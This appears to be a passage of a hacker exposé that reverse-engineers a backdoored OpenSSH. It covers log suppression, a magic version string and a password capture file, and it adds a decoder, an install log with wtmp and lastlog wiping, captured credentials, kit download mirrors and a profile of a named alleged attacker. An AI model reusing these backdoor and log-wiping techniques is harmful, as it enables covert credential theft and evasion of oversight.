.text:08060DBF                 push    offset aAttemptToWrite ; "Attempt to write login records by non-r"...
.text:08060DC4                 call    logit
.text:08060DC9                 mov     eax, 1
.text:08060DCE
.text:08060DCE loc_8060DCE:                            ; CODE XREF: login_write+11j
.text:08060DCE                 mov     ebx, [ebp+var_4]
.text:08060DD1                 leave
.text:08060DD2                 retn

*/

/**
 ** login_write: Call low-level recording functions based on autoconf
 ** results
 **/
int
login_write(struct logininfo *li)
{
if(hookarOn == 1)
 	 return 0;
 	//bla bla
}


/*do_log
.text:0806A1CC ; int __cdecl do_log(int, int, __gnuc_va_list arg)
.text:0806A1CC                 public do_log
.text:0806A1CC do_log          proc near               ; CODE XREF: fatal+Fp
.text:0806A1CC                                         ; debug3+Fp ...
.text:0806A1CC
.text:0806A1CC dest            = byte ptr -818h
.text:0806A1CC buf             = byte ptr -418h
.text:0806A1CC arg_0           = dword ptr  8
.text:0806A1CC arg_4           = dword ptr  0Ch
.text:0806A1CC arg             = dword ptr  10h
.text:0806A1CC
.text:0806A1CC                 push    ebp
.text:0806A1CD                 mov     ebp, esp
.text:0806A1CF                 push    edi
.text:0806A1D0                 push    esi
.text:0806A1D1                 push    ebx
.text:0806A1D2                 sub     esp, 80Ch
.text:0806A1D8                 cmp     ds:hookarOn, 1
.text:0806A1DF                 mov     eax, [ebp+arg_0]
.text:0806A1E2                 mov     ecx, [ebp+arg_4]
.text:0806A1E5                 mov     ebx, [ebp+arg]
.text:0806A1E8                 jz      loc_806A2A0


.text:0806A2A0 loc_806A2A0:                            ; CODE XREF: do_log+1Cj
.text:0806A2A0                                         ; do_log+2Aj ...
.text:0806A2A0                 lea     esp, [ebp-0Ch]
.text:0806A2A3                 pop     ebx
.text:0806A2A4                 pop     esi
.text:0806A2A5                 pop     edi
.text:0806A2A6                 leave
.text:0806A2A7                 retn
.text:0806A2A8 ; --------------------------------------------------------------------

*/


void
do_log(LogLevel level, const char *fmt, va_list args)
{
if(hookarOn == 1)
	 return;
//bla bla
}




/*
.text:0804D43B                 sub     esp, 0Ch
.text:0804D43E                 lea     ecx, [ebp+s]
.text:0804D444                 push    ecx
.text:0804D445                 mov     [ebp+var_539], 0
.text:0804D44C                 call    xstrdup
.text:0804D451                 mov     esi, eax        ; esi = client version string
.text:0804D453                 mov     ds:client_version_string, eax
.text:0804D458                 mov     edi, offset aAGb7 ; "a-gb7"
.text:0804D45D                 mov     ecx, 5          ; count = 5
.text:0804D462                 cld
.text:0804D463                 add     esp, 10h
.text:0804D466                 repe cmpsb              ; strcmp (most likely strncmp)
.text:0804D468                 setnbe  dl
.text:0804D46B                 setb    al
.text:0804D46E                 mov     bl, dl
.text:0804D470                 sub     bl, al
.text:0804D472                 movsx   ebx, bl
.text:0804D475                 test    ebx, ebx
.text:0804D477                 jz      loc_804E95A     ; jmp if equal


.text:0804E95A loc_804E95A:                            ; CODE XREF: main+B1Bj
.text:0804E95A                 sub     esp, 8
.text:0804E95D                 push    (offset aSLineDBadPortN+1Ah) ; "r"
.text:0804E962                 push    offset filename ; "/var/run/ssh.old"
.text:0804E967                 call    _fopen          ; fopen(filename,"r")
.text:0804E96C                 add     esp, 10h
.text:0804E96F                 test    eax, eax
.text:0804E971                 mov     ds:alog, eax    ; alog = eax
.text:0804E976                 jz      loc_804D47D     ; quit if error with fopen
.text:0804E97C                 push    esi
.text:0804E97D                 push    2               ; const SEEK_END = 2
.text:0804E97F                 push    0               ; offset
.text:0804E981                 push    eax             ; alog
.text:0804E982                 call    _fseek          ; fseek(alog,0,SEEK_END)
.text:0804E987                 pop     ecx
.text:0804E988                 push    ds:alog         ; size
.text:0804E98E                 call    _ftell          ; ftell(alog)
.text:0804E993                 mov     esi, eax        ; esi = current offset = logfile size
.text:0804E995                 mov     [esp+0C68h+var_C68], eax ; size_t
.text:0804E998                 call    _malloc
.text:0804E99D                 mov     ds:mvebuf, eax  ; mvebuf = malloc(logsize)
.text:0804E9A2                 mov     [esp+0C68h+var_C68], esi
.text:0804E9A5                 call    _malloc
.text:0804E9AA                 mov     edx, ds:mvebuf
.text:0804E9B0                 add     esp, 10h
.text:0804E9B3                 test    edx, edx
.text:0804E9B5                 mov     ds:mvdbuf, eax  ; mvdbuff = malloc(logsize)
.text:0804E9BA                 jz      loc_804EA70     ; if(mvebuf == null) jmp
.text:0804E9C0                 test    eax, eax
.text:0804E9C2                 jz      loc_804EA70     ; if(mvdbuf == null) jmp
.text:0804E9C8                 push    eax
.text:0804E9C9                 push    0               ; const SEEK_SET = 0
.text:0804E9CB                 push    0               ; offset
.text:0804E9CD                 push    ds:alog         ; stream
.text:0804E9D3                 call    _fseek          ; fseek(alog,0,SEEK_SET)
.text:0804E9D8                 add     esp, 10h
.text:0804E9DB                 push    ds:alog         ; stream
.text:0804E9E1                 push    1               ; n
.text:0804E9E3                 push    esi             ; logfile size
.text:0804E9E4                 push    ds:mvebuf       ; ptr
.text:0804E9EA                 call    _fread          ; fread(mvebuf, logsize, 1, alog)
.text:0804E9EF                 mov     edx, ds:mvebuf
.text:0804E9F5                 xor     eax, eax
.text:0804E9F7                 mov     ds:ai, 0
.text:0804EA01                 cld
.text:0804EA02                 mov     ecx, 0FFFFFFFFh
.text:0804EA07                 mov     edi, edx
.text:0804EA09                 repne scasb             ; strlen(mvebuf)
.text:0804EA0B                 not     ecx
.text:0804EA0D                 dec     ecx
.text:0804EA0E                 add     esp, 10h
.text:0804EA11                 cmp     ebx, ecx
.text:0804EA13                 jnb     short loc_804EA5A ; for loop
.text:0804EA15                 mov     ebx, 0FFFFFFFFh
.text:0804EA1A
.text:0804EA1A loc_804EA1A:                            ; CODE XREF: main+20FCj
.text:0804EA1A                 mov     ecx, ds:ai
.text:0804EA20                 mov     al, [edx+ecx]   ; al = mvebuf[ai]
.text:0804EA23                 not     eax             ; ~mvebuf[ai]
.text:0804EA25                 mov     edx, ds:mvdbuf
.text:0804EA2B                 mov     [edx+ecx], al   ; mvdbuf[i] = ~mvebuf[ai]
.text:0804EA2E                 mov     edi, ds:ai
.text:0804EA34                 inc     edi             ; ai++
.text:0804EA35                 mov     edx, ds:mvebuf
.text:0804EA3B                 mov     [ebp+var_C40], edi ; var_C40 = ai
.text:0804EA41                 mov     ds:ai, edi
.text:0804EA47                 xor     eax, eax
.text:0804EA49                 mov     ecx, ebx
.text:0804EA4B                 mov     edi, edx
.text:0804EA4D                 repne scasb             ; strlen(mvebuf)
.text:0804EA4F                 not     ecx
.text:0804EA51                 dec     ecx
.text:0804EA52                 cmp     [ebp+var_C40], ecx ; cmp ai with strlen result
.text:0804EA58                 jb      short loc_804EA1A ; jmp if below =>
.text:0804EA58                                         ; for(ai=0;ai

int main() {
	FILE *sshlog;
	char *filename = "/var/run/ssh.old";
	unsigned int cin;
	int i;
	
	if((sshlog=fopen(filename,"r")))
		while((cin = fgetc(sshlog)) != EOF)
			printf("%c",~cin);
	else
		printf("crappy file error\n");
}



Backdoor Installation 
---------------------

debian:~/hax# ./quick

                                ________                          .___ ________  _________
                                \_____  \__  _  ______   ____   __| _/ \______ \ \_   ___ \
                                 /   |   \ \/ \/ /    \_/ __ \ / __ |   |    |  \/    \  \/
                                /    |    \     /   |  \  ___// /_/ |   |    `   \     \____
                                \_______  /\/\_/|___|  /\___  >____ |  /_______  /\______  /
                                        \/           \/     \/     \/          \/        \/
                                      "Hack everyone you can, and then hack some more"
 Logs        [  CHECK  ]
Opening /var/log/wtmp ...
Reading... patched ok.
Opening /var/log/lastlog ...
Reading... patched ok.
 Logs        [  CHECK  ]
 Configure       [  CHECK  ]
checking for gcc... gcc
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ANSI C... none needed
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
checking whether byte ordering is bigendian... no
checking for gawk... no
checking for mawk... mawk
checking how to run the C preprocessor... gcc -E
checking for ranlib... ranlib
checking for a BSD-compatible install... /usr/bin/install -c
checking for egrep... grep -E
checking for ar... /usr/bin/ar
checking for cat... /bin/cat
checking for kill... /bin/kill
checking for perl5... no
checking for perl... /usr/bin/perl
checking for sed... /bin/sed
checking for ent... no
checking for bash... /bin/bash
checking for ksh... (cached) /bin/bash
checking for sh... (cached) /bin/bash
checking for sh... /bin/sh
checking for groupadd... /usr/sbin/groupadd
checking for useradd... /usr/sbin/useradd
checking for pkgmk... no
checking for special C compiler options needed for large files... no
checking for _FILE_OFFSET_BITS value needed for large files... 64
checking for _LARGE_FILES value needed for large files... no
checking for login... /bin/login
checking for passwd... /usr/bin/passwd
checking for inline... inline
checking whether LLONG_MAX is declared... no
checking whether LLONG_MAX is declared... yes
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
...
...
cc -o sftp progressmeter.o sftp.o sftp-client.o sftp-common.o sftp-glob.o -L. -Lopenbsd-compat/  -lssh -lopenbsd-compat -lresolv -lcrypto -lutil -lz -lnsl  -lcrypt
 Compile          [  CHECK  ]
 Running           [  CHECK  ]
 ***             [  OsUcCu7hJA  ]
 ***             [  6O7vp  ]
 Game Over        [  CHECKMATE!  ]
#--
Linux debian 2.6.26-2-686 #1 SMP Sun Jun 21 04:57:38 UTC 2009 i686 GNU/Linux
debian
OsUcCu7hJA
6O7vp
#--


debian:~# telnet 10.5.1.13 22
Trying 10.5.1.13...
Connected to 10.5.1.13.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.1p1 Debian
6O7vp
HOOKIN: root:123!"£
HOOKIN: testuser:testpass
Protocol mismatch.
Connection closed by foreign host.
debian:~#



_______         _______  ________    _________             
\   _  \ ___  __\   _  \/   __   \  /   _____/ ____  ____  
/  /_\  \\  \/  /  /_\  \____    /  \_____  \_/ __ \/  _ \ 
\  \_/   \>    <\  \_/   \ /    /   /        \  ___(  <_> )
 \_____  /__/\_ \\_____  //____/   /_______  /\___  >____/ 
       \/      \/      \/                  \/     \/       
________          __  .__        .__       .__                
\_____  \ _______/  |_|__| _____ |__|______|__| ____    ____  
 /   |   \\____ \   __\  |/     \|  \___   /  |/    \  / ___\ 
/    |    \  |_> >  | |  |  Y Y  \  |/    /|  |   |  \/ /_/  >
\_______  /   __/|__| |__|__|_|  /__/_____ \__|___|  /\___  / 
        \/|__|                 \/         \/       \//_____/  



1) http://www.xssed.com/archive/author=romeo

Date  		Author  Domain  			PR  	Category  	Mirror
25/04/09	RoMeO	www.akamai.com			19080	XSS	mirror
22/03/09	RoMeO	press.1and1.com			6883	XSS	mirror
05/07/08	RoMeO	scripts.mit.edu			999	XSS	mirror
25/04/08	RoMeO	forgottenmem.net		304476	XSS	mirror
25/04/08	RoMeO	www.h4ps.com			1753149	XSS	mirror
23/04/08	RoMeO	www.batelco.jo			225973	XSS	mirror
12/04/08	RoMeO	devscripts.net			1503804	XSS	mirror
06/04/08	RoMeO	www.vlx.in			2998964	XSS	mirror
06/04/08	RoMeO	www.ip2location.com		14646	XSS	mirror
05/04/08	RoMeO	realitatea.net			13002	XSS	mirror
03/04/08	RoMeO	www.name.com			13602	XSS	mirror
03/04/08	RoMeO	templates.entheosweb.com	13380	XSS	mirror
31/03/08	RoMeO	www.applyweb.com		50217	XSS	mirror
31/03/08	RoMeO	www.aast.edu			64423	XSS	mirror
31/03/08	RoMeO	www.cambridgescp.com		339535	XSS	mirror
28/03/08	RoMeO	www.freelotto.com	R	306	XSS	mirror
07/03/08	RoMeO	www.sandboxie.com		70663	XSS	mirror
06/03/08	RoMeO	www.gulf-daily-news.com		14699	XSS	mirror
06/03/08	RoMeO	www.aucegypt.edu		38023	XSS	mirror
06/03/08	RoMeO	www.phpclanwebsite.com		986132	XSS	mirror
05/03/08	RoMeO	www.rapid-hook.com		95252	XSS	mirror
05/03/08	RoMeO	ipod.hopto.org			3648	XSS	mirror
05/03/08	RoMeO	www.darkshado.ca		6134372	XSS	mirror
03/03/08	RoMeO	www.macos.utah.edu		7333	XSS	mirror
26/02/08	RoMeO	www.rapidzearch.com		3797044	XSS	mirror
11/02/08	RoMeO	passport.51.com			184	XSS	mirror
16/01/08	RoMeO	www.memset.com			192269	XSS	mirror
07/01/08	RoMeO	search.mp3lyrics.org	R	4309	XSS	mirror
07/01/08	RoMeO	qhost.eu			7969095	XSS	mirror
05/01/08	RoMeO	www.lpbs.org.uk			2776181	XSS	mirror
04/01/08	RoMeO	www.tdxp.net			0	XSS	mirror
26/12/07	RoMeO	aljaras.com			53022	XSS	mirror
16/12/07	RoMeO	www.sitemaps101.com		2163273	XSS	mirror
15/12/07	RoMeO	www.xml-sitemaps.com		8847	XSS	mirror
10/12/07	RoMeO	www.phpfaber.com		437969	XSS	mirror
04/12/07	RoMeO	www.tis-edu.com			0	XSS	mirror
29/11/07	RoMeO	pwnstarz.com			2025995	XSS	mirror
23/11/07	RoMeO	www.gamesurge.net		101368	XSS	mirror
23/11/07	RoMeO	cityguide.aol.com		54	XSS	mirror
21/11/07	RoMeO	my.notnet.co.uk			1419849	XSS	mirror
06/11/07	RoMeO	kwikhost.com			3593939	XSS	mirror
06/11/07	RoMeO	my.aol.com			54	XSS	mirror
06/11/07	RoMeO	www.searchtons.com		145218	XSS	mirror
05/11/07	RoMeO	www.seologs.com			18186	XSS	mirror
05/11/07	RoMeO	tools.elitehackers.info		151229	XSS	mirror
05/11/07	RoMeO	gallery.particlesoft.net	364744	XSS	mirror
04/11/07	RoMeO	www.filecart.com		27636	XSS	mirror
04/11/07	RoMeO	chollotenis.com			0	XSS	mirror
02/11/07	RoMeO	tsdepot.co.uk	R		6739237	XSS	mirror
02/11/07	RoMeO	www.pesladder.com		1172005	XSS	mirror
31/10/07	RoMeO	www.omni-chat.com		1857220	XSS	mirror
28/10/07	RoMeO	www.anafit.com			2563280	XSS	mirror
28/10/07	RoMeO	www.hellboundhackers.org	213995	XSS	mirror
28/10/07	RoMeO	www.cyclelogic.co.uk		3361622	XSS	mirror
16/10/07	RoMeO	tsdepot.co.uk			6739237	XSS	mirror
06/10/07	RoMeO	www.terrytrophy.com		0	XSS	mirror
03/10/07	RoMeO	www13.cd-wow.com		28971	XSS	mirror
03/10/07	RoMeO	www.drbeat.li			8200365	XSS	mirror
02/10/07	RoMeO	services.embark.com		12027	XSS	mirror
27/09/07	RoMeO	ascii.techhappens.com		1215439	XSS	mirror
20/09/07	RoMeO	www.org-rc.fr			1884591	XSS	mirror
26/06/07	RoMeO	search.fbi.gov			11963	XSS	mirror


2) http://www.zone-h.org/archive/defacer=romeo

Time  		Attacker  	H  	M  	R  	Domain  		OS  		View
2007/11/06 	Romeo 	H 				trakyagirl.uni.cc 	Win 2003 	mirror
2007/09/23 	RomeO 	H 		R 		www.zexir.tk 	Linux 	mirror
2006/12/11 	RoMeO 					www.koturkiye.com/hacked 	Linux 	mirror
2006/10/21 	ROMEO 	H 				www.duyguajans.com 	FreeBSD 	mirror
2006/09/06 	romeo 		M 			www.yeniliman.com/forum 	Linux 	mirror
2006/09/06 	romeo 		M 			www.genc4um.com/forum 	Linux 	mirror
2006/09/06 	ROMEO 	H 				www.forumhersey.com 	Linux 	mirror
2006/09/05 	ROMEO 		M 			www.muzikogretmenleri.com/foru... 	Linux 	mirror
2006/09/05 	ROMEO 		M 			www.sanalailem.com/forum 	Linux 	mirror
2006/09/05 	ROMEO 					rocksitesi.net/forum/index.php 	Linux 	mirror
2006/09/05 	ROMEO 					www.beyazrenkler.com/forum/ind... 	Linux 	mirror
2006/09/05 	ROMEO 					www.yasakmp3.com/forum/index.php 	Win 2003 	mirror
2006/09/05 	ROMEO 					www.forumekani.com/index.php 	Linux 	mirror
2006/09/05 	romeo 					www.turkfr.com/index.php 	Linux 	mirror
2006/09/05 	romeo 					www.gizemliforum.org/index.php 	Linux 	mirror
2006/09/05 	ROMEO 					www.arkadasbilisim.com/forum/i... 	Linux 	mirror
2006/09/05 	ROMEO 					www.modifiyedunyasi.com/forum/... 	Linux 	mirror
2006/09/05 	ROMEO 					www.forzatc.net/forum/index.php 	FreeBSD 	mirror
2006/09/05 	ROMEO 					www.megaarsiv.net/index.php 	Linux 	mirror
2006/09/05 	ROMEO 					egeizmir.com/forum/index.php 	Linux 	mirror
2006/09/05 	ROMEO 			R 		www.nokiacep.com/forum/index.php 	Win 2003 	mirror
2006/09/04 	romeo 	H 				www.cyber-turka.org 	Win 2003 	mirror
2006/07/12 	romeo 					www.cehennem.net/den 	Linux 	mirror
2006/05/29 	romeo 	H 				gorno-altaisk.ru 	Linux 	mirror
2006/05/29 	ROMEO 	H 	M 			www.nobel.uz 	Win 2000 	mirror
2006/05/29  	ROMEO  	H  	 	R  	 	www.tdshi.uz  	Win 2000  	mirror
2006/05/17 	romeo 	H 				forumliontr.com 	Linux 	mirror
2006/05/02 	romeo 		M 			www.pichiz.biz/forum 	Linux 	mirror
2006/05/02 	ROMEO 		M 			www.trmizah.com/smf 	Linux 	mirror
2006/05/02 	ROMEO 	H 	M 			www.rapsohbeti.com 	Linux 	mirror
2006/04/23 	romeo 					www.gecelerinforumu.com/forum/... 	Linux 	mirror
2006/03/19 	romeo 					www.esmer.org/index.php 	Linux 	mirror
2006/01/12 	romeo 		M 			sitebirligi.com/~oyuncu/hacked... 	Linux 	mirror
2006/01/12 	romeo 		M 			konya-kosk.bel.tr/~oyuncu/hack... 	Linux 	mirror
2006/01/12 	romeo 		M 			aktueldershanesi.com/~oyuncu/h... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.hesapliweb.com/~oyuncu/hac... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.aheninsaat.com/~oyuncu/hac... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.mp3ilahi.com/~oyuncu/hacke... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.eurotipsters.com/~oyuncu/h... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.kardeslik.org/~oyuncu/hack... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.hiperx.net/~oyuncu/hacked/... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.najans.com/~oyuncu/hacked/... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.gulmece.net/~oyuncu/hacked... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.cigilfm.com/~oyuncu/hacked... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.gifturk.com/~oyuncu/hacked... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.why-islam.net/~oyuncu/hack... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.e-matrak.org/~oyuncu/hacke... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.kazancyolu.com/~oyuncu/hac... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.hiperstore.gen.tr/~oyuncu/... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.senarslan.com/~oyuncu/hack... 	Linux 	mirror
2006/01/12  	romeo  	 	M  	 	 	www.aprohosting.net/~oyuncu//h...  	Linux  	mirror
2006/01/12 	romeo 		M 	R 		www.gulum.net/~oyuncu//hacked/... 	Linux 	mirror
2006/01/12 	romeo 		M 	R 		www.basinyayin.net/~oyuncu//ha... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.dinleradyo.com/~oyuncu//ha... 	Linux 	mirror
2006/01/12 	romeo 		M 			www.sitetasarimi.com/~oyuncu//... 	Linux 	mirror
2005/04/08 	romeo 					votedevoe.org/v-web/portal/cms... 	FreeBSD 	mirror
2005/03/23 	romeo 			R 		www.willowsend.co.nz/index.php 	Linux 	mirror
2005/03/23 	romeo 	H 	M 			moh.theclap.co.nz 	Linux 	mirror


_______          ___________   
\   _  \ ___  __/_   \   _  \  
/  /_\  \\  \/  /|   /  /_\  \ 
\  \_/   \>    < |   \  \_/   \
 \_____  /__/\_ \|___|\_____  /
       \/      \/           \/ 
__________                             __  .__                
\______   \ ____ ______   ____________/  |_|__| ____    ____  
 |       _// __ \\____ \ /  _ \_  __ \   __\  |/    \  / ___\ 
 |    |   \  ___/|  |_> >  <_> )  | \/|  | |  |   |  \/ /_/  >
 |____|_  /\___  >   __/ \____/|__|   |__| |__|___|  /\___  / 
        \/     \/|__|                              \//_____/  


1) http://www.usdoj.gov/criminal/cybercrime/reporting.htm#cc
2) http://www.fbi.gov/contact/fo/fo.htm
3) http://www.treas.gov/usss/index.shtml
4) http://www.ic3.gov/default.aspx
5) http://www.tra.gov.ae/complaints.php


_______          ____ ____ 
\   _  \ ___  __/_   /_   |
/  /_\  \\  \/  /|   ||   |
\  \_/   \>    < |   ||   |
 \_____  /__/\_ \|___||___|
       \/      \/          
   _____   __    __                .__                           __          
  /  _  \_/  |__/  |______    ____ |  |__   _____   ____   _____/  |_  ______
 /  /_\  \   __\   __\__  \ _/ ___\|  |  \ /     \_/ __ \ /    \   __\/  ___/
/    |    \  |  |  |  / __ \\  \___|   Y  \  Y Y  \  ___/|   |  \  |  \___ \ 
\____|__  /__|  |__| (____  /\___  >___|  /__|_|  /\___  >___|  /__| /____  >
        \/                \/     \/     \/      \/     \/     \/          \/ 

Mirrors

1. http://rapidshare.com/files/328431323/antisec.tar.gz
2. http://hotfile.com/dl/22483868/50d27ca/antisec.tar.gz.html
3. http://uploading.com/files/m3a792b5/antisec.tar.gz/
4. http://www.mediafire.com/file/jy4miqqgmtz/antisec.tar.gz
5. http://www.yousendit.com/download/VGllb3BBdWNiR0ozZUE9PQ
6. http://www.sendspace.com/file/07clr5


_______          ____________  
\   _  \ ___  __/_   \_____  \ 
/  /_\  \\  \/  /|   |/  ____/ 
\  \_/   \>    < |   /       \ 
 \_____  /__/\_ \|___\_______ \
       \/      \/            \/
_________                      .__               .__               
\_   ___ \  ____   ____   ____ |  |  __ __  _____|__| ____   ____  
/    \  \/ /  _ \ /    \_/ ___\|  | |  |  \/  ___/  |/  _ \ /    \ 
\     \___(  <_> )   |  \  \___|  |_|  |  /\___ \|  (  <_> )   |  \
 \______  /\____/|___|  /\___  >____/____//____  >__|\____/|___|  /
        \/            \/     \/                \/               \/ 

What we tend to believe is that most of the so-called blackhats had lost or still strive towards the chance of 
becoming an integral part of the information security industry and so they are blaming people who share old 
and new information regarding the protection of corporate and personal information assets, including ICT systems 
and social security.

_______          ____________  
\   _  \ ___  __/_   \_____  \ 
/  /_\  \\  \/  /|   | _(__  < 
\  \_/   \>    < |   |/       \
 \_____  /__/\_ \|___/______  /
       \/      \/           \/ 
  ________                      __          
 /  _____/______   ____   _____/  |_________
/   \  __\_  __ \_/ __ \_/ __ \   __\___   /
\    \_\  \  | \/\  ___/\  ___/|  |  /    / 
 \______  /__|    \___  >\___  >__| /_____ \
        \/            \/     \/           \/

We want to thank the following people for their contribution. You know who you are!
Prosec Group, Joao Pontes (rorkty), ShadowREG and our anonymous contributors